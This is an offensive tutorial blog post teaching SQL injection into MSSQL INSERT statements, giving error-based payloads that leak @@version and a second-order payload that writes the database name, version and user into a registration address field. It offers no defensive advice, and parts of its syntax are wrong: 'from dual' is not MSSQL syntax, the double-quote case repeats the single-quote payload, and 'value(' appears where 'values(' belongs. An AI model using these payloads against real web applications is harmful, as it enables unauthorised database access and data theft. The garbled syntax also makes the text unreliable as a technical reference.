In the Name of ALLAH the Most Beneficent and the Merciful

This is just an addup to our collection on different injection points in SQLi, In this tutorial we are going to learn injecting in MSSQL insert Query.

Same as MySQL Insert query injection this too can be done in two way:

1. Error based.
2. Second Order Exploitation

Lets first start with Error Based SQLi, if you read my tutorial on MSSQL Error Based Injection You must already be comfirtable with Error based Injection in MSSQL so we are going to use the same syntax.

Insert Query Example:
insert into tablename (column1,column2,column3,column4)values(1,'value2','value3','value4');

How to confirm an Insert based query, well thats pretty simple if you can see the erorr else trial and error method thats what we always do.

1. Error Based

Here too remember the three basic rules of Injecting Close, Inject and then Balance, Let us assume we have an injection in one of the input values in the above query now heres the Error Based Injection Syntax:
If input is Integer Based
(select 1 from dual where @@version=1)
If Input is Between Single Quote
'*(select 1 from dual where @@version=1)*'
If Input is Between Double Quotes
'*(select 1 from dual where @@version=1)*'
Once we Inject it will make the below query:
insert into tablename (column1,column2,column3,column4)values(1,'value2',''*(select 1 from dual where @@version=1)*'','value4');
The above query will create an Error which will show us the version as Output and for the rest of error based Exploitation you can go back and check my tutorial on Error Based MSSQLi.

Here is a video which Shows practical Error based MSSQLi in Insert Query.

2. Second Order Exploitation

If you know + is used to concatenate two string in MSSQL so we can also use this to concatenate the output of our injection to a field which we can see later somewhere in the application.

For example lets say we have such injection in register form of a site and this is the final Query which it makes to insert our user.
Insert into users (name,username,password,address,status)value('your_input_name','your_input_username','your_input_password','your_input_address',1);
Now here the best field to insert our injection is address we can usually see our address once we are registered. So our Final injected query will be.
Insert into users (name,username,password,address,status)value('your_input_name','your_input_username','your_input_password',''+db_name()+0x3a3a+@@version+0x3a3a+user+'',1);
This will print the output of current database, version and user in place of address output. I sure will try soon to get a complete video tutorial on Second Order Exploitation for MSSQL.

I hope you enjoyed reading the tutorial, will soon be up with more tutorials keep reading and learning.

Author : Zen Javanicus
Date : 2015-04-12